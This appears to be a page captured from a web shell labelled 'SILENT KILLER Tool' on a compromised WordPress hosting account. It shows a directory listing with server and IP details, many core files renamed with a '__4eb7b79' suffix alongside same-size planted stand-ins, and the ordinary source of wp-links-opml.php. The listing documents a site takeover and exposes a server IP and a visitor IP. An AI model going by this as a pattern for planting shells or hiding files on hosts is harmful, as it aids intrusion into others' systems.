Current Path: > home > > branxxtp > credithike.com
Operation : Linux premium107.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 198.54.126.246 | Your IP: 216.73.216.181 Domains : 1034 Domain(s) Permission : [ 0555 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| a0583 | Directory | - | - | |
| cgi-bin__4eb7b79 | Directory | - | - | |
| ght | Directory | - | - | |
| wp-admin__4eb7b79 | Directory | - | - | |
| wp-content | Directory | - | - | |
| wp-content__4eb7b79 | Directory | - | - | |
| wp-includes__4eb7b79 | Directory | - | - | |
| .htaccess | File | 1156 bytes | December 10 2023 01:02:50. | |
| 403.php | File | 264 bytes | January 29 2026 14:49:58. | |
| admin.php | File | 5361 bytes | February 11 2026 05:58:24. | |
| buy.php | File | 1478 bytes | February 20 2024 01:02:50. | |
| config.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| configuration.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| error_log | File | 2301 bytes | February 06 2026 06:25:05. | |
| index.htm0 | File | 1104 bytes | December 27 2023 01:02:48. | |
| index.html0 | File | 1104 bytes | December 27 2023 01:02:48. | |
| index.php | File | 13760 bytes | August 18 2023 01:02:50. | |
| inputs.php | File | 127 bytes | February 07 2026 20:08:52. | |
| main.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| php.ini | File | 40 bytes | February 09 2026 14:13:04. | |
| robots.txt | File | 367 bytes | August 29 2023 01:02:50. | |
| unsubscribe.php | File | 6268 bytes | February 09 2026 04:55:05. | |
| wp-activate.php__4eb7b79 | File | 7349 bytes | December 03 2025 05:53:14. | |
| wp-blog-header.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-blog-header.php__4eb7b79 | File | 287 bytes | January 08 2026 02:33:34. | |
| wp-config.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-config.php__4eb7b79 | File | 10526 bytes | January 04 2026 22:45:58. | |
| wp-links-opml.php__4eb7b79 | File | 2493 bytes | December 03 2025 05:53:11. | |
| wp-load.php__4eb7b79 | File | 3937 bytes | December 03 2025 05:53:11. | |
| wp-login.php__4eb7b79 | File | 51437 bytes | December 03 2025 05:53:11. | |
| wp-mail.php__4eb7b79 | File | 8727 bytes | December 03 2025 05:53:11. | |
| wp-settings.php | File | 1104 bytes | January 01 1970 00:00:00. | |
| wp-settings.php__4eb7b79 | File | 31055 bytes | December 03 2025 05:53:14. | |
| wp-signup.php__4eb7b79 | File | 34516 bytes | April 15 2025 17:50:20. | |
| xmlrpc.php__4eb7b79 | File | 3205 bytes | April 15 2025 17:50:16. |
<?php
/**
* Outputs the OPML XML format for getting the links defined in the link
* administration. This can be used to export links from one blog over to
* another. Links aren't exported by the WordPress export, so this file handles
* that.
*
* This file is not added by default to WordPress theme pages when outputting
* feed links. It will have to be added manually for browsers and users to pick
* up that this file exists.
*
* @package WordPress
*/
require_once __DIR__ . '/wp-load.php';
header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
$link_cat = '';
if ( ! empty( $_GET['link_cat'] ) ) {
$link_cat = $_GET['link_cat'];
if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) {
$link_cat = absint( urldecode( $link_cat ) );
}
}
echo '<?xml version="1.0"?' . ">\n";
?>
<opml version="1.0">
<head>
<title>
<?php
/* translators: %s: Site title. */
printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) );
?>
</title>
<dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated>
<?php
/**
* Fires in the OPML header.
*
* @since 3.0.0
*/
do_action( 'opml_head' );
?>
</head>
<body>
<?php
if ( empty( $link_cat ) ) {
$cats = get_categories(
array(
'taxonomy' => 'link_category',
'hierarchical' => 0,
)
);
} else {
$cats = get_categories(
array(
'taxonomy' => 'link_category',
'hierarchical' => 0,
'include' => $link_cat,
)
);
}
foreach ( (array) $cats as $cat ) :
/** This filter is documented in wp-includes/bookmark-template.php */
$catname = apply_filters( 'link_category', $cat->name );
?>
<outline type="category" title="<?php echo esc_attr( $catname ); ?>">
<?php
$bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) );
foreach ( (array) $bookmarks as $bookmark ) :
/**
* Filters the OPML outline link title text.
*
* @since 2.2.0
*
* @param string $title The OPML outline title text.
*/
$title = apply_filters( 'link_title', $bookmark->link_name );
?>
<outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated="
<?php
if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) {
echo $bookmark->link_updated;
}
?>
" />
<?php
endforeach; // $bookmarks
?>
</outline>
<?php
endforeach; // $cats
?>
</body>
</opml>
SILENT KILLER Tool